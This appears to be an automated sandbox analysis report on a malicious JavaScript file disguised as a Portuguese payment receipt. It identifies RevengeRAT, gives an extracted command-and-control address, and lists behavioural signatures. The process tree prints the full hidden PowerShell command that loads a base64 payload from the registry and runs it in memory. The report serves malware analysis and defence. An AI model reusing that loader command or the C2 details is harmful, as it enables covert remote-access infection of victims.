Analysis

  • max time kernel
    120s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-12-2024 15:44

General

  • Target

    comprovantedepagamento.js

  • Size

    116KB

  • MD5

    0c3e47c0fb0d5a289fded25fd9746817

  • SHA1

    2117b82b1724a2f146ffd015b50ce45c63d7fb87

  • SHA256

    2e166d7183aca77bc9ebaa54d8048374aa780ece1ffc159ecf57ec75f96a8e4d

  • SHA512

    bf8b2895fa9cf32c651d67ff68c3156dfd2f32e4fc9308ec5a190eaf942816feae1357086b150442c4359619356cf6cf3bd4e9bcf8d866b52c51b0c3978133ad

  • SSDEEP

    1536:D12+GPp0PG/6Rn/T5d1XtQpm7GOzYCtFA:p2+GB0PG/sn/T5dt+IdG

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

38.51.135.44:333

Mutex

9822cb7521c94057

Signatures

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Revengerat family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\comprovantedepagamento.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2512
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -windowstyle hidden -Command "$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'cocacola').cocacola;[byte[]]$_0 = [System.Convert]::FromBase64String($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2164

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2164-4-0x000007FEF579E000-0x000007FEF579F000-memory.dmp

    Filesize

    4KB

  • memory/2164-5-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2164-6-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB

  • memory/2164-7-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

    Filesize

    9.6MB

  • memory/2164-8-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

    Filesize

    9.6MB

  • memory/2164-9-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

    Filesize

    9.6MB

  • memory/2164-10-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

    Filesize

    9.6MB

  • memory/2164-11-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

    Filesize

    9.6MB

  • memory/2164-12-0x000000001B550000-0x000000001B55A000-memory.dmp

    Filesize

    40KB

  • memory/2164-13-0x000007FEF579E000-0x000007FEF579F000-memory.dmp

    Filesize

    4KB

  • memory/2164-14-0x000007FEF54E0000-0x000007FEF5E7D000-memory.dmp

    Filesize

    9.6MB